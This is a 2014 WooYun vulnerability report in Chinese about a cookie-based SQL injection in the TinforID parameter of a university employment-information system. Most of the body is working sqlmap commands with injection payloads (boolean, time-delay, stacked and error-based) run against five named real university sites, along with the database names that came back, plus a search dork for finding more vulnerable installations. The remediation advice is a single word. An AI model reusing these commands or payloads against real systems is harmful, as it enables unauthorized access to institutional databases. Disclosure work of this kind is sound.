当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-080434

漏洞标题:某高校就业信息服务系统通用Cookie注入

相关厂商:上海甲鼎

漏洞作者: error

提交时间:2014-10-23 11:09

修复时间:2015-04-02 11:06

公开时间:2015-04-02 11:06

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:18

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-10-23: 细节已通知厂商并且等待厂商处理中
2014-10-28: 厂商主动忽略漏洞,细节向第三方安全合作伙伴开放
2014-12-22: 细节向核心白帽子及相关领域专家公开
2015-01-01: 细节向普通白帽子公开
2015-01-11: 细节向实习白帽子公开
2015-04-02: 细节向公众公开

简要描述:

某高校就业信息服务系统通用Cookie注入

详细说明:

甲鼎高校就业信息服务系统
NewsList.asp?TinforID
http://www.infojiading.cn/
成功案例:
http://www.infojiading.cn/Information.asp?TParentColumnId=0003
百度搜索: site:edu.cn 版权所有 技术支持:上海甲鼎

1.png


注入链接:/ NewsList.asp
注入参数:TinforID

漏洞证明:

(1)http://job.sicfl.edu.cn/
$ py sqlmap.py -u http://jy.shutcm.edu.cn/NewsList.asp --cookie="TinforID=1111" --level 5 --risk 3 --dbs -v 1
---
Place: Cookie
Parameter: TinforID
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: TinforID=154' AND 2655=2655 AND 'EGSS'='EGSS
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: TinforID=154'; WAITFOR DELAY '0:0:5'--
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: TinforID=154' WAITFOR DELAY '0:0:5'--
---
[14:23:13] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008 or Vista
web application technology: ASP.NET, ASP, Microsoft IIS 7.0
back-end DBMS: Microsoft SQL Server 2005
[14:23:13] [INFO] fetching database names
[14:23:13] [INFO] fetching number of databases
[14:23:13] [INFO] resumed: 7
[14:23:13] [INFO] resumed: AadmissionsOffice
[14:23:13] [INFO] resumed: Graduate&Management
[14:23:13] [INFO] resumed: IJCenterOfCareer
[14:23:13] [INFO] resumed: master
[14:23:13] [INFO] resumed: model
[14:23:13] [INFO] resumed: msdb
[14:23:13] [INFO] resumed: tempdb
available databases [7]:
[*] [Graduate&Management]
[*] AadmissionsOffice
[*] IJCenterOfCareer
[*] master
[*] model
[*] msdb
[*] tempdb

1.png


(2) http://jy.shutcm.edu.cn/NewsList.asp
$ py sqlmap.py -u http://jy.shutcm.edu.cn/NewsList.asp --cookie="TinforID=1111" --level 5 --risk 3 --dbs -v 1
---
Place: Cookie
Parameter: TinforID
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: TinforID=154' AND 2655=2655 AND 'EGSS'='EGSS
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: TinforID=154'; WAITFOR DELAY '0:0:5'--
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: TinforID=154' WAITFOR DELAY '0:0:5'--
---
[14:35:18] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008 or Vista
web application technology: ASP.NET, ASP, Microsoft IIS 7.0
back-end DBMS: Microsoft SQL Server 2005
[14:35:18] [INFO] fetching database names
[14:35:18] [INFO] fetching number of databases
[14:35:18] [INFO] resumed: 7
[14:35:18] [INFO] resumed: AadmissionsOffice
[14:35:18] [INFO] resumed: Graduate&Management
[14:35:18] [INFO] resumed: IJCenterOfCareer
[14:35:18] [INFO] resumed: master
[14:35:18] [INFO] resumed: model
[14:35:18] [INFO] resumed: msdb
[14:35:18] [INFO] resumed: tempdb
available databases [7]:
[*] [Graduate&Management]
[*] AadmissionsOffice
[*] IJCenterOfCareer
[*] master
[*] model
[*] msdb
[*] tempdb

2.png


(3) http://job.smic.edu.cn/NewsList.asp
$ py sqlmap.py -u http://job.smic.edu.cn/NewsList.asp --cookie="TinforID=1111" --level 5 --risk 3 --dbs -v 1
sqlmap/1.0-dev - automatic SQL injection and database takeover tool
http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end u
[*] starting at 15:12:08
[15:12:08] [INFO] resuming back-end DBMS 'microsoft sql server'
[15:12:08] [INFO] testing connection to the target URL
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: Cookie
Parameter: TinforID
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: TinforID=-2964' OR (1859=1859) AND 'BIWo'='BIWo
Type: error-based
Title: Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause
Payload: TinforID=-7641' OR 4526=CONVERT(INT,(SELECT CHAR(113)+CHAR(115)+CHAR(120)+CHAR(114)+CHAR(113)+(SELECT (
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: TinforID=1111'; WAITFOR DELAY '0:0:5'--
---
[15:12:09] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2000
[15:12:09] [INFO] fetching database names
[15:12:09] [INFO] the SQL query used returns 10 entries
[15:12:09] [INFO] resumed: Graduate&Management
[15:12:09] [INFO] resumed: IJCenterOfCareer
[15:12:09] [INFO] resumed: master
[15:12:09] [INFO] resumed: model
[15:12:09] [INFO] resumed: msdb
[15:12:09] [INFO] resumed: Northwind
[15:12:09] [INFO] resumed: pubs
[15:12:09] [INFO] resumed: tempdb
[15:12:09] [INFO] resumed: xuegong
[15:12:09] [INFO] resumed: xuegongtest
available databases [10]:
[*] Graduate&Management
[*] IJCenterOfCareer
[*] master
[*] model
[*] msdb
[*] Northwind
[*] pubs
[*] tempdb
[*] xuegong
[*] xuegongtest

3.png


(4) http://jyxx.shumc.edu.cn
$ py sqlmap.py -u http://jyxx.shumc.edu.cn/NewsList.asp --cookie="TinforID=1111" --level 5 --risk 3 --dbs -v 0
sqlmap/1.0-dev - automatic SQL injection and database takeover tool
http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end
[*] starting at 15:23:54
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: Cookie
Parameter: TinforID
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: TinforID=-6512' OR (3928=3928) AND 'ouRE'='ouRE
Type: error-based
Title: Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause
Payload: TinforID=-5592' OR 8926=CONVERT(INT,(SELECT CHAR(113)+CHAR(111)+CHAR(109)+CHAR(109)+CHAR(113)+(SELECT
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: TinforID=1111'; WAITFOR DELAY '0:0:5'--
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase OR time-based blind (heavy query)
Payload: TinforID=-8878' OR 7647=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysu
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2005
[15:23:54] [INFO] resumed: Graduate&Management
[15:23:54] [INFO] resumed: IJCenterOfCareer
[15:23:54] [INFO] resumed: master
[15:23:54] [INFO] resumed: model
[15:23:54] [INFO] resumed: msdb
[15:23:54] [INFO] resumed: ReportServer$sql2005
[15:23:54] [INFO] resumed: ReportServer$sql2005TempDB
[15:23:54] [INFO] resumed: tempdb
[15:23:54] [INFO] resumed: Trans
[15:23:54] [INFO] resumed: Trans2
[15:23:54] [INFO] resumed: yuanl
available databases [11]:
[*] Graduate&Management
[*] IJCenterOfCareer
[*] master
[*] model
[*] msdb
[*] ReportServer$sql2005
[*] ReportServer$sql2005TempDB
[*] tempdb
[*] Trans
[*] Trans2
[*] yuanl

4.png


(5) http://jy.sthu.edu.cn/
$ py sqlmap.py -u http://jy.sthu.edu.cn/NewsList.asp --cookie="TinforID=1111" --level 5 --risk 3 --dbs -v 1
---
Place: Cookie
Parameter: TinforID
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: TinforID=-1870' OR (6515=6515) AND 'whCL'='whCL
Type: error-based
Title: Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause
Payload: TinforID=-5376' OR 9872=CONVERT(INT,(SELECT CHAR(113)+CHAR(107)+CHAR(104)+CHAR(110)+CHAR(113)+(SELECT
---
[21:47:43] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, Microsoft IIS 7.5, ASP
back-end DBMS: Microsoft SQL Server 2005
[21:47:43] [INFO] fetching database names
[21:47:43] [INFO] the SQL query used returns 6 entries
[21:47:43] [INFO] resumed: Graduate&Management
[21:47:43] [INFO] resumed: IJCenterOfCareer
[21:47:43] [INFO] resumed: master
[21:47:43] [INFO] resumed: model
[21:47:43] [INFO] resumed: msdb
[21:47:43] [INFO] resumed: tempdb
available databases [6]:
[*] Graduate&Management
[*] IJCenterOfCareer
[*] master
[*] model
[*] msdb
[*] tempdb

5.png

修复方案:

过滤

版权声明:转载请注明来源 error@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-04-02 11:06

厂商回复:

最新状态:

暂无


漏洞评价:

评论